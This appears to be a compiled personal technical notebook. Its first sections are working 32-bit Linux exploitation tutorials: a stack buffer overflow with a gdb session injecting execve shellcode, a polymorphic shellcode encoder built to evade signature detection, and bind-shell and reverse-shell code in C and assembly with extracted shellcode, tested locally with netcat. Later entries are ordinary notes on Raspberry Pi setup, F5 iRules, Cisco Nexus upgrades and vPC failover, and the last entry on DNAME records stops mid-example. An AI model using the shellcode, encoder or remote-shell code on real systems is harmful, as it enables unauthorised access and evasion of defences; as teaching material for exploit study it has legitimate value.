# Buffer overflow and arbitrary code execution (32-bit)


Disable protections

# echo '0' > /proc/sys/kernel/randomize_va_space
# echo '0' > /proc/sys/kernel/exec-shield
# echo '0' > /proc/sys/kernel/exec-shield-randomize


Vulnerable code

# cat vulnerable.c
#include <stdio.h>
#include <string.h>

void check_password(char *p){
        char password[64];
        strcpy(password,p);
        if(strcmp(password,"nop-sled")==0){printf("Correct password\n");}
        else{printf("Incorrect password\n");}
}

int main(int argc,char **argv){
        check_password(argv[1]);
        return 0;
}
# gcc -g -fno-stack-protector -z execstack -o vulnerable vulnerable.c

Arbitrary code execution

# gdb -q vulnerable
(gdb) list 1,14
1       #include <stdio.h>
2       #include <string.h>
3
4       void check_password(char *p){
5               char password[64];
6               strcpy(password,p);
7               if(strcmp(password,"nop-sled")==0){printf("Correct password\n");}
8               else{printf("Incorrect password\n");}
9       }
10
11      int main(int argc,char **argv){
12              check_password(argv[1]);
13              return 0;
14      }
(gdb) break 6
(gdb) disassemble main
Dump of assembler code for function main:
   0x08048477 <+0>:     push   %ebp
   0x08048478 <+1>:     mov    %esp,%ebp
   0x0804847a <+3>:     and    $0xfffffff0,%esp
   0x0804847d <+6>:     sub    $0x10,%esp
   0x08048480 <+9>:     mov    0xc(%ebp),%eax
   0x08048483 <+12>:    add    $0x4,%eax
   0x08048486 <+15>:    mov    (%eax),%eax
   0x08048488 <+17>:    mov    %eax,(%esp)
   0x0804848b <+20>:    call   0x8048414 <check_password>
   0x08048490 <+25>:    mov    $0x0,%eax
   0x08048495 <+30>:    leave
   0x08048496 <+31>:    ret
End of assembler dump.
(gdb) run wakamole
Starting program: /vulnerable wakamole

Breakpoint 1, check_password (p=0xbffff935 "wakamole") at vulnerable.c:6
6               strcpy(password,p);
(gdb) x /20x password
0xbffff6f0:     0x08048261      0x00000000      0x00ca0000      0x00000001
0xbffff700:     0xbffff91f      0x0000002f      0xbffff75c      0xb7fd1ff4
0xbffff710:     0x080484a0      0x08049ff4      0x00000002      0x080482fd
0xbffff720:     0xb7fd23e4      0x00000005      0x08049ff4      0x080484c1
0xbffff730:     0x00000000      0x00000000      0xbffff758      0x08048490
(gdb) run `perl -e 'print "\x90"x16 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90\x90" . "\xb0\xf6\xff\xbf"x9'`
The program being debugged has been started already.
Start it from the beginning? (y o n) y

Starting program: /vulnerable `perl -e 'print "\x90"x16 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90\x90" . "\xb0\xf6\xff\xbf"x9'`

Breakpoint 1, check_password (
    p=0xbffff8ed "\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\061\300\231\260\vRh//shh/bin\211\343R\211\342S\211\341̀\220\220\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277\260\366\377\277")
    at vulnerable.c:6
6               strcpy(password,p);
(gdb) x /20x password
0xbffff6b0:     0x08048261      0x00000000      0x00ca0000      0x00000001
0xbffff6c0:     0xbffff8d7      0x0000002f      0xbffff71c      0xb7fd1ff4
0xbffff6d0:     0x080484a0      0x08049ff4      0x00000002      0x080482fd
0xbffff6e0:     0xb7fd23e4      0x00000005      0x08049ff4      0x080484c1
0xbffff6f0:     0x00000000      0x00000000      0xbffff718      0x08048490
(gdb) next
7               if(strcmp(password,"nop-sled")==0){printf("Correct password\n");}
(gdb) x /20x password
0xbffff6b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff6c0:     0xb099c031      0x2f68520b      0x6868732f      0x6e69622f
0xbffff6d0:     0x8952e389      0xe18953e2      0x909080cd      0xbffff6b0
0xbffff6e0:     0xbffff6b0      0xbffff6b0      0xbffff6b0      0xbffff6b0
0xbffff6f0:     0xbffff6b0      0xbffff6b0      0xbffff6b0      0xbffff6b0
(gdb) continue
Incorrect password
process 2246 is executing new program: /bin/dash
# exit


References

http://www.overflowedminds.net/Papers/Newlog/Introduccion-Explotacion-Software-Linux.pdf

# Polymorphic shellcode generator


Execve shellcode

# od2sc execve
"\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

Decoder shellcode

# cat decoder.asm
BITS 32
jmp short jmptrick
decoder:
pop esi
xor ecx,ecx
mov cl,0
loop:
sub byte [esi+ecx-1],0
dec cl
jnz loop
jmp short obfuscated_code
jmptrick:
call decoder
obfuscated_code:
# nasm -f elf decoder.asm
# ld -o decoder decoder.o
# od2sc decoder
"\xeb\x10\x5e\x31\xc9\xb1\x00\x80\x6c\x0e\xff\x00\xfe\xc9\x75\xf7\xeb\x05\xe8\xeb\xff\xff\xff"

Polymorphic shellcode generator

# cat pscg
#!/bin/bash

# Name:   pscg (polymorphic shellcode generator)
# Usage:  pscg <shellcode> [offset]

shellcode="$1"
offset="$2"

bytes=`echo $shellcode | tr -d \" | sed 's/\\\x/\n/g' | grep -v ^$`
max=`echo "$bytes" | sort -ru | head -n1`
length=0
decoder="\xeb\x10\x5e\x31\xc9\xb1\x00\x80\x6c\x0e\xff\x00\xfe\xc9\x75\xf7\xeb\x05\xe8\xeb\xff\xff\xff"

if [ "$offset" == "" ]; then offset=`bconv FF-$max x x`; fi

echo ""
echo "input      = \"$shellcode\""
echo "offset     = 0x$offset"

for byte in `echo "$bytes"`; do
        length=`bconv $length+1 x x`
        obfuscated=$(echo -n "$obfuscated\x`bconv $byte+$offset x x`")
done

echo "obfuscated = \"$obfuscated\""
echo "length     = 0x$length"

decoder=`echo $decoder | sed -e "s/00/$length/" -e "s/00/$offset/"`

echo "decoder    = \"$decoder\""
echo ""

output="$decoder$obfuscated"

echo "output  = \"$output\""
echo ""
echo -ne $output | ndisasm -u -
# pscg "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

input      = "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"
offset     = 0x1c
obfuscated = "\x4d\xdc\xb5\xcc\x27\x6e\x84\x4b\x4b\x8f\x84\x84\x4b\x7e\x85\x8a\xa5\xff\x6e\xa5\xfe\x6f\xa5\xfd\xe9\x9c"
length     = 0x1a
decoder    = "\xeb\x10\x5e\x31\xc9\xb1\x1a\x80\x6c\x0e\xff\x1c\xfe\xc9\x75\xf7\xeb\x05\xe8\xeb\xff\xff\xff"

output  = "\xeb\x10\x5e\x31\xc9\xb1\x1a\x80\x6c\x0e\xff\x1c\xfe\xc9\x75\xf7\xeb\x05\xe8\xeb\xff\xff\xff\x4d\xdc\xb5\xcc\x27\x6e\x84\x4b\x4b\x8f\x84\x84\x4b\x7e\x85\x8a\xa5\xff\x6e\xa5\xfe\x6f\xa5\xfd\xe9\x9c"

00000000  EB10              jmp short 0x12
00000002  5E                pop esi
00000003  31C9              xor ecx,ecx
00000005  B11A              mov cl,0x1a
00000007  806C0EFF1C        sub byte [esi+ecx-0x1],0x1c
0000000C  FEC9              dec cl
0000000E  75F7              jnz 0x7
00000010  EB05              jmp short 0x17
00000012  E8EBFFFFFF        call dword 0x2
00000017  4D                dec ebp
00000018  DCB5CC276E84      fdiv qword [ebp-0x7b91d834]
0000001E  4B                dec ebx
0000001F  4B                dec ebx
00000020  8F84844B7E858A    pop dword [esp+eax*4-0x757a81b5]
00000027  A5                movsd
00000028  FF6EA5            jmp dword far [esi-0x5b]
0000002B  FE                db 0xfe
0000002C  6F                outsd
0000002D  A5                movsd
0000002E  FD                std
0000002F  E9                db 0xe9
00000030  9C                pushfd

Polymorphic shellcode execution

# cat shellcode.c
#include <stdio.h>

char shellcode[]="\xeb\x10\x5e\x31\xc9\xb1\x1a\x80\x6c\x0e\xff\x1c\xfe\xc9\x75\xf7\xeb\x05\xe8\xeb\xff\xff\xff\x4d\xdc\xb5\xcc\x27\x6e\x84\x4b\x4b\x8f\x84\x84\x4b\x7e\x85\x8a\xa5\xff\x6e\xa5\xfe\x6f\xa5\xfd\xe9\x9c";
int main(){
        int *ret;
        ret=(int*)&ret+2;
        (*ret)=(int)shellcode;
}
# gcc -z execstack -o shellcode shellcode.c
# ./shellcode
# exit

References

http://www.overflowedminds.net/Papers/Newlog/Introduccion-Explotacion-Software-Linux.pdf

# Local, remote and reverse shellcodes


Local shellcode

# cat execve.c
#include <unistd.h>

int main(){
        char *shell[2];
        shell[0]="/bin/sh";
        shell[1]=0;
        execve("/bin/sh",shell,NULL);
}
# gcc -o execve execve.c
# ./execve
# exit
# cat execve.asm
BITS 32
; execve("/bin/sh",shell,NULL)
xor eax,eax
cdq                     ; xor edx,edx
mov byte al,11          ; system call number
push edx                ; \0
push long 0x68732f2f    ; hs//
push long 0x6e69622f    ; nib/
mov ebx,esp             ; first parameter
push edx
mov edx,esp             ; third parameter
push ebx
mov ecx,esp             ; second parameter
int 0x80                ; system call
# nasm -f elf execve.asm
# ld -o execve execve.o
# ./execve
# exit
# od2sc execve
"\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

Remote shellcode

SERVER# cat remote_execve.c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int main(){
        char *shell[2];
        int cfd,i,sockfd;
        struct sockaddr_in sin;

        sockfd=socket(AF_INET,SOCK_STREAM,0);
        sin.sin_family=AF_INET;
        sin.sin_addr.s_addr=0;
        sin.sin_port=htons(1234);
        bind(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in));
        listen(sockfd,128); // cat /proc/sys/net/core/somaxconn
        cfd=accept(sockfd,NULL,0);
        for(i=0;i<3;i++){
                dup2(cfd,i);
        }
        shell[0]="/bin/sh";
        shell[1]=0;
        execve("/bin/sh",shell,NULL);
}
SERVER# gcc -o remote_execve remote_execve.c
SERVER# ./remote_execve
CLIENT# nc 127.0.0.1 1234
hostname
SERVER
exit
CLIENT#
# cat remote_execve.asm
BITS 32
section .txt
global _start
_start:
; sockfd=socket(AF_INET,SOCK_STREAM,0)
; sockfd=socket(2,1,0)
push byte 0x66          ; socketcall number (102)
pop eax
cdq                     ; xor edx,edx
xor ebx,ebx
inc ebx                 ; ebx=0x00000001 (socket)
push edx                ; edx=0x00000000
push byte 0x01
push byte 0x02
mov ecx,esp
int 0x80                ; system call
xchg esi,eax
; bind(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))
; bind(sockfd,[2,1234,0],16)
push byte 0x66          ; socketcall number (102)
pop eax
inc ebx                 ; ebx=0x00000002 (bind)
push edx                ; edx=0x00000000
push word 0xd204        ; 1234
push word bx            ; 0x0002
mov ecx,esp
push byte 0x10          ; 16
push ecx
push esi
mov ecx,esp
int 0x80                ; system call
; listen(sockfd,128)
mov byte al,0x66        ; socketcall number (102)
mov byte bl,0x80        ; 128
push ebx
mov byte bl,0x04        ; ebx=0x00000004 (listen)
push esi
mov ecx,esp
int 0x80                ; system call
; cfd=accept(sockfd,NULL,0)
mov byte al,0x66        ; socketcall number (102)
inc ebx                 ; ebx=0x00000005 (accept)
push edx
push edx
push esi
mov ecx,esp
int 0x80                ; system call
xchg eax,ebx
; dup2(cfd,i)
push byte 0x2
pop ecx
dup_loop:
mov byte al,0x3f        ; dup2 number (63)
int 0x80                ; system call
dec ecx
jns dup_loop
; execve("/bin/sh",shell,NULL)
xor eax,eax
mov byte al,11          ; system call number
push edx                ; \0
push long 0x68732f2f    ; hs//
push long 0x6e69622f    ; nib/
mov ebx,esp             ; first parameter
push edx
mov edx,esp             ; third parameter
push ebx
mov ecx,esp             ; second parameter
int 0x80                ; system call
SERVER# nasm -f elf remote_execve.asm
SERVER# ld -o remote_execve remote_execve.o
SERVER# ./remote_execve
CLIENT# nc 127.0.0.1 1234
hostname
SERVER
exit
CLIENT#
SERVER# od2sc remote_execve
"\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\x43\x52\x66\x68\x04\xd2\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x80\x53\xb3\x04\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

Reverse shellcode

SERVER# cat reverse_execve.c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int main(){
        char *shell[2];
        int i,sockfd;
        struct sockaddr_in sin;

        sockfd=socket(AF_INET,SOCK_STREAM,0);
        sin.sin_family=AF_INET;
        sin.sin_addr.s_addr=inet_addr("127.0.0.1");
        sin.sin_port=htons(1234);
        connect(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in));
        for(i=0;i<3;i++){
                dup2(sockfd,i);
        }
        shell[0]="/bin/sh";
        shell[1]=0;
        execve("/bin/sh",shell,NULL);
}
SERVER# gcc -o reverse_execve reverse_execve.c
CLIENT# nc -lv 127.0.0.1 1234
SERVER# ./reverse_execve

Connection from 127.0.0.1 port 1234 [tcp/*] accepted
hostname
SERVER
exit
CLIENT#

SERVER# cat reverse_execve.asm
BITS 32
section .txt
global _start
_start:
; sockfd=socket(AF_INET,SOCK_STREAM,0)
; sockfd=socket(2,1,0)
push byte 0x66          ; socketcall number (102)
pop eax
cdq                     ; xor edx,edx
xor ebx,ebx
inc ebx                 ; ebx=0x00000001 (socket)
push edx                ; edx=0x00000000
push byte 0x01
push byte 0x02
mov ecx,esp
int 0x80                ; system call
xchg esi,eax
; connect(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in))
; connect(sockfd,[2,1234,127.0.0.1],16)
push byte 0x66          ; socketcall number (102)
pop eax
inc ebx
push dword 0x01bbbb7f   ; 127.187.187.1
xor ecx,ecx
mov word [esp+1],cx     ; 127.0.0.1
push word 0xd204        ; 1234
push word bx            ; 0x0002
mov ecx,esp
push byte 0x10          ; 16
push ecx
push esi
mov ecx,esp
inc ebx                 ; ebx=0x00000003 (connect)
int 0x80                ; system call
xchg ebx,esi
; dup2(cfd,i)
push byte 0x2
pop ecx
dup_loop:
mov byte al,0x3f        ; dup2 number (63)
int 0x80                ; system call
dec ecx
jns dup_loop
; execve("/bin/sh",shell,NULL)
xor eax,eax
mov byte al,11          ; system call number
push edx                ; \0
push long 0x68732f2f    ; hs//
push long 0x6e69622f    ; nib/
mov ebx,esp             ; first parameter
push edx
mov edx,esp             ; third parameter
push ebx
mov ecx,esp             ; second parameter
int 0x80                ; system call
SERVER# nasm -f elf reverse_execve.asm
SERVER# ld -o reverse_execve reverse_execve.o
CLIENT# nc -lv 127.0.0.1 1234
SERVER# ./reverse_execve

Connection from 127.0.0.1 port 1234 [tcp/*] accepted
hostname
SERVER
exit
CLIENT#

SERVER# od2sc reverse_execve
"\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\x43\x68\x7f\xbb\xbb\x01\x31\xc9\x66\x89\x4c\x24\x01\x66\x68\x04\xd2\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x87\xde\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"


References

http://www.overflowedminds.net/Papers/Newlog/Introduccion-Explotacion-Software-Linux.pdf

# Objdump to shellcode char array

# cat od2sc
#!/bin/bash

# Name:   od2sc (objdump to shellcode)
# Usage:  od2sc <object_file>

objdump -D $1 \
| awk -F'\t' '{print $2}' \
| grep -v ^$ \
| tr -d '\n' \
| sed -e 's/ \+/\\x/g' -e 's/^/"\\x/' -e 's/\\x$/\"\n/'

# od2sc execve
"\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

# Arch Linux on Raspberry Pi


Hardware specification (Model B)

- SOC: Broadcom BCM2835 (CPU, GPU, DSP, SDRAM, and single USB port)
- CPU: 700 MHz ARM1176JZF-S core
- GPU: Broadcom VideoCore IV,OpenGL ES 2.0,OpenVG 1080p30 H.264 high-profile encode/decode
- SDRAM: 512 MiB
- USB 2.0: 2 (via integrated USB hub)
- Video outputs: Composite video | Composite RCA, HDMI (not at the same time)
- Audio outputs: TRS connector | 3.5 mm jack, HDMI
- Onboard Storage: SD / MMC / SDIO card slot
- Onboard network: 10/100 Ethernet (RJ45) via USB hub
- Low-level peripherals: 8 × GPIO, UART, I2C bus, SPI bus
- Power ratings: 700 mA (3.5 W)
- Power source: 5 volt via MicroUSB or GPIO header
- Size: 85.60 mm × 53.98 mm
- Weight: 45 g

Download and checking

# wget http://files.velocix.com/c1410/images/archlinuxarm/archlinux-hf-2012-09-18/archlinux-hf-2012-09-18.zip
# sha1sum archlinux-hf-2012-09-18.zip
Installation and partition resize

# unzip archlinux-hf-2012-09-18.zip
# dd bs=1M if=archlinux-hf-2012-09-18.img of=/dev/mmcblk0
# sfdisk -l /dev/mmcblk0
# sfdisk /dev/mmcblk0 << EOF
> 32,3008,c,*
> 3040,,L
> EOF
# e2fsck -f /dev/mmcblk0p2
# resize2fs /dev/mmcblk0p2
Booting and login

alarmpi login: root
Password: root
Password and new user

[root@alarmpi ~]# passwd
[root@alarmpi ~]# useradd -m -G users,wheel -s /bin/bash toni
[root@alarmpi ~]# passwd toni
Update and upgrade

[root@alarmpi ~]# pacman -Syu
[root@alarmpi ~]# pacman -S haveged
[root@alarmpi ~]# haveged -w 1024
[root@alarmpi ~]# pacman-key --init
[root@alarmpi ~]# pkill haveged
[root@alarmpi ~]# pacman -Rs haveged
Locale

[root@alarmpi ~]# cat /etc/vconsole.conf
KEYMAP=es
FONT=lat9w-16
FONT_MAP=8859-1_to_uni
[root@alarmpi ~]# grep -v \# /etc/locale.gen
es_ES.UTF-8 UTF-8
[root@alarmpi ~]# locale-gen
[root@alarmpi ~]# echo -e "\nexport LANG=es_ES.UTF-8" >> /etc/profile
Timezone

[root@alarmpi ~]# cp /usr/share/zoneinfo/Europe/Madrid /etc/localtime
Environment customization

[root@alarmpi ~]# tail -n5 /etc/bash.bashrc
PS1='\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
alias ls='ls --color=auto'
alias grep='grep --color=auto'
alias ll='ls -lhF'
alias la='ll -a'
Hostname

[root@alarmpi ~]# cat /etc/hostname 
raspberry
Network

[root@alarmpi ~]# cat /etc/hosts
127.0.0.1 raspberry.lab.net raspberry localhost
[root@alarmpi ~]# cat /etc/resolv.conf
nameserver 8.8.8.8
[root@alarmpi ~]# cat /etc/conf.d/dhcpcd
DHCPCD_ARGS="-q -C resolv.conf"
[root@alarmpi ~]# cat /etc/conf.d/network
interface=eth0
address=192.168.1.100
netmask=24
broadcast=192.168.1.255
gateway=192.168.1.1
[root@alarmpi ~]# pacman -S ppp
[root@alarmpi ~]# pacman -S usb_modeswitch
[root@alarmpi ~]# wget "http://www.sakis3g.org/versions/latest/armv4t/sakis3g.gz"
[root@alarmpi ~]# echo "6c88a9961ba8861f2f668c178c02403f  sakis3g.gz" | md5sum -c
[root@alarmpi ~]# gunzip -v sakis3g.gz
[root@alarmpi ~]# chmod +x sakis3g
[root@alarmpi ~]# mv sakis3g /usr/local/sbin/.
[root@alarmpi ~]# cat /etc/sakis3g.conf
APN="airtelnet.es"
APN_USER="vodafone"
APN_PASS="vodafone"
SIM_PIN="1234"
USBINTERFACE="0"
OTHER="CUSTOM_TTY"
CUSTOM_TTY="/dev/ttyUSB0"
[root@alarmpi ~]# cat /etc/systemd/system/network.service
[Unit]
Description=Network IP Connectivity
Wants=network.target
Before=network.target

[Service]
Type=oneshot
RemainAfterExit=yes
EnvironmentFile=/etc/conf.d/network
ExecStart=/sbin/ip link set dev ${interface} up
ExecStart=/sbin/ip addr add ${address}/${netmask} broadcast ${broadcast} dev ${interface}
ExecStart=/sbin/ip route add default via ${gateway}
ExecStart=/usr/local/sbin/sakis3g connect --console

ExecStop=/sbin/ip addr flush dev ${interface}
ExecStop=/sbin/ip link set dev ${interface} down
ExecStop=/usr/local/sbin/sakis3g disconnect

[Install]
WantedBy=multi-user.target
[root@alarmpi ~]# systemctl disable dhcpcd@eth0.service
[root@alarmpi ~]# systemctl enable network
[root@alarmpi ~]# reboot
Text editor

root@raspberry:~# pacman -S vim
Sound

root@raspberry:~# pacman -S alsa-firmware alsa-utils
root@raspberry:~# modprobe snd-bcm2835
root@raspberry:~# cat /etc/modules-load.d/snd-bcm2835.conf
snd-bcm2835
root@raspberry:~# alsamixer
root@raspberry:~# pacman -S pulseaudio vlc
Video

root@raspberry:~# pacman -S xorg-server xorg-xinit xorg-utils xorg-server-utils
root@raspberry:~# pacman -S xf86-video-fbdev
root@raspberry:~# pacman -S openbox obconf obmenu lxappearance
root@raspberry:~# pacman -S xterm
[toni@raspberry ~]$ mkdir -p /home/toni/.config/openbox/
[toni@raspberry ~]$ cp /etc/xdg/openbox/menu.xml /home/toni/.config/openbox/.
[toni@raspberry ~]$ cp /etc/xdg/openbox/rc.xml /home/toni/.config/openbox/.
[toni@raspberry ~]$ cat .xinitrc
exec dbus-launch openbox-session
[toni@raspberry ~]$ starx
Backup

# dd bs=1M if=/dev/mmcblk0 of=archberry.backup.img
Base development package (Compile C programs)

root@raspberry:~# pacman -Syu
root@raspberry:~# pacman -S base-devel
Binutils

root@raspberry:~# pacman -Syu
root@raspberry:~# pacman -S binutils
Install packages from the AUR with packer

root@raspberry:~# pacman -Syu
root@raspberry:~# mkdir builds
root@raspberry:~# cd builds
root@raspberry:~/builds# wget https://aur.archlinux.org/packages/pa/packer/packer.tar.gz
root@raspberry:~/builds# tar xvzf packer.tar.gz
root@raspberry:~/builds# cd packer
root@raspberry:~/builds/packer# makepkg -s --asroot
root@raspberry:~/builds/packer# cp pkg/packer/usr/bin/packer /usr/bin/packer
root@raspberry:~/builds/packer# cp pkg/packer/usr/share/man/man8/packer.8.gz /usr/share/man/man8/packer.8.gz
root@raspberry:~/builds/packer# cd
root@raspberry:~# rm -rf builds
root@raspberry:~# packer -S comgt
WiringPi library for GPIO access

root@raspberry:~# pacman -Syu
root@raspberry:~# pacman -S wiringpi
[toni@raspberry ~]$ curl http://wiringpi.com/pins
[toni@raspberry ~]$ curl http://wiringpi.com/examples/blink
[toni@raspberry ~]$ gpio mode 0 out
[toni@raspberry ~]$ while [ true ]; do gpio write 0 1; sleep 2; gpio write 0 0; sleep 2; done

# Load balancing based on iRule


iRule configuration

when CLIENT_ACCEPTED {

  set mypool   "foobar"
  set client_1 "1.1.1.1"
  set client_2 "1.1.1.2"
  set server_1 "2.2.2.1"
  set server_2 "2.2.2.2"

  if { [IP::client_addr] eq $client_1 } then {
    if { [LB::status pool $mypool member $server_1] eq "up" } then {
      pool $mypool member $server_1
    } else {
      pool $mypool member $server_2
    }
  } elseif { [IP::client_addr] eq $client_2 } then {
    if { [LB::status pool $mypool member $server_2] eq "up" } then {
      pool $mypool member $server_2
    } else {
      pool $mypool member $server_1
    }
  } else {
    persist uie "[IP::client_addr]"
    pool $mypool
  }
}


References

https://devcentral.f5.com/irules

# Nexus 5000 upgrade and downgrade procedure


Topology (Dual-Homed)

[N5k1]---PK---[N5k2]
[N5k1]---PL---[N5k2]
[N5k1]---vPC1---[N2k-fex101]
[N5k1]---vPC2---[N2k-fex102]
[N5k1]---vPC3---[N2k-fex103]
[N5k2]---vPC1---[N2k-fex101]
[N5k2]---vPC2---[N2k-fex102]
[N5k2]---vPC3---[N2k-fex103]


Determining the upgrade impact

If you are upgrading from a NX-OS release 4.2.(1)N1(1) or later releases, you are able to do an ISSU (In-Service Software Upgrade).
If the following commands pass the test, you can do a non-disruptive upgrade (ISSU), if not, you will have a disruptive upgrade:
N5k# show incompatibility system bootflash:n5000.bin
N5k# show install all impact kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin
N5k# show spanning-tree issu-impact
N5k# show lacp issu-impact

Disruptive upgrade

1. Verify the required space to upload the kickstart and system images in the primary and secondary switches (N5k):
N5k1# dir bootflash:
N5k2# dir bootflash:
2. If necessary, delete unneeded files to make space available.
3. Copy the new kickstart and system images to the switches bootflash.
4. Display the impact of the upgrade:
N5k1# show install all impact kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin
N5k2# show install all impact kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin
5. Upgrade the primary switch:

N5k1# install all kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin
6. After the primary switch has been reloaded, change the boot variables on the secondary switch and save the configuration:

N5k2(config)# boot system bootflash:n5000.bin
N5k2(config)# boot kickstart bootflash:n5000-kickstart.bin
N5k2# copy running-configuration startup-configuration
7. Once done, reload from the secondary switch each FEX sequencially, one after the other:

N5k2# reload fex 101
N5k2# reload fex 102
N5k2# reload fex 103
8. Finally, reload the secondary switch without saving the current configuration:

N5k2# reload

NonDisruptive upgrade

1. Verify the required space to upload the kickstart and system images in the primary and secondary switches (N5k):
N5k1# dir bootflash:
N5k2# dir bootflash:
2. If necessary, delete unneeded files to make space available.
3. Copy the new kickstart and system images to the switches bootflash.
4. Display the impact of the upgrade:
N5k1# show install all impact kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin
N5k2# show install all impact kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin
5. Upgrade the primary switch:

N5k1# install all kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin

6. After the primary switch has been reloaded, all FEX begin a rolling upgrade (automatic).
7. Once done, upgrade the secondary switch:

N5k2# install all kickstart bootflash:n5000-kickstart.bin system bootflash:n5000.bin

Downgrade

1. Verify the required space to upload the kickstart-old and system-old images in the switch (N5k):
N5k# dir bootflash:
2. If necessary, delete unneeded files to make space available.
3. Copy the kickstart-old and system-old images to the switch bootflash.
4. Display the impact of the upgrade:
N5k# show install all impact kickstart bootflash:n5000-kickstart-old.bin system bootflash:n5000-old.bin
5. Downgrade the switch:

N5k# install all kickstart bootflash:n5000-kickstart-old.bin system bootflash:n5000-old.bin

Notes

- An ISSU is a nondisruptive upgrade. The control plane is reloaded, but the data plane does not stop forwarding packets.
- The kickstart.bin contains the kickstart image.
- The system.bin contains the image, bios and fex images.

# vPC failure scenarios


Topology

[ N7K1 ]--- PK ---[ N7K2 ]
[ N7K1 ]--- PL ---[ N7K2 ]

[ N7K1 ]--- vPC ---[ N5K ]
[ N7K2 ]--- vPC ---[ N5K ]

Peer-Link goes down

[ N7K1 ]

- Peer-Link up --> down
- Peer-Keepalive up
- vPC up
- Role: primary

[ N7K2 ]

- Peer-Link up --> down
- Peer-Keepalive up
- vPC up ------> down (suspend)
- Role: secondary

Peer-Link is down and Peer-Keepalive goes down as well (dual active)

[ N7K1 ]

- Peer-Link down
- Peer-Keepalive up --> down
- vPC up
- Role: primary

[ N7K2 ]

- Peer-Link down
- Peer-Keepalive up --> down
- vPC down ------> up (if auto-recovery enabled)
- Role: secondary ------> primary (if auto-recovery enabled)

Peer-Keepalive goes down

[ N7K1 ]

- Peer-Link up
- Peer-Keepalive up --> down
- vPC up
- Role: primary

[ N7K2 ]

- Peer-Link up
- Peer-Keepalive up --> down
- vPC up
- Role: secondary

Peer-Keepalive is down and Peer-Link goes down as well (dual-active)

[ N7K1 ]

- Peer-Link up --> down
- Peer-Keepalive down
- vPC up
- Role: primary

[ N7K2 ]

- Peer-Link up --> down
- Peer-Keepalive down
- vPC up
- Role: secondary ------> primary (if auto-recovery enabled)

Peer-Link and Peer-Keepalive go down at the same time (dual-active)

[ N7K1 ]

- Peer-Link up --> down
- Peer-Keepalive up --> down
- vPC up
- Role: primary

[ N7K2 ]

- Peer-Link up --> down
- Peer-Keepalive up --> down
- vPC up
- Role: secondary ------> primary (if auto-recovery enabled)

All tracked objects go down on primary

[ N7K1 ]

- Peer-Link up --> down
- Peer-Keepalive up
- vPC up --> down
- Role: primary ------> secondary

[ N7K2 ]

- Peer-Link up --> down
- Peer-Keepalive up
- vPC up
- Role: secondary ------> primary

All tracked objects go down on primary and Peer-Keepalive goes down at the same time

[ N7K1 ]

- Peer-Link up --> down
- Peer-Keepalive up --> down
- vPC up --> down
- Role: primary

[ N7K2 ]

- Peer-Link up --> down
- Peer-Keepalive up --> down
- vPC up
- Role: secondary ------> primary (if auto-recovery enabled)

Primary has power failure and is shut down

[ N7K2 ]

- Peer-Link up --> down
- Peer-Keepalive up --> down
- vPC up
- Role: secondary ------> primary (if auto-recovery enabled)

# VPN pre-shared key recovery


ASA# more system:running-config
ASA# copy running-config tftp
ASA# copy running-config ftp

# DNAME records


A CNAME (Canonical Name) record creates an alias between hostnames in the same domain or in different domains.
A DNAME (Delegation Name) record creates an alias between different domains.
For example:

NS1 is authoritative for the left.org domain:
left.org DNAME right.com

NS2 is authoritative for the right.com domain:
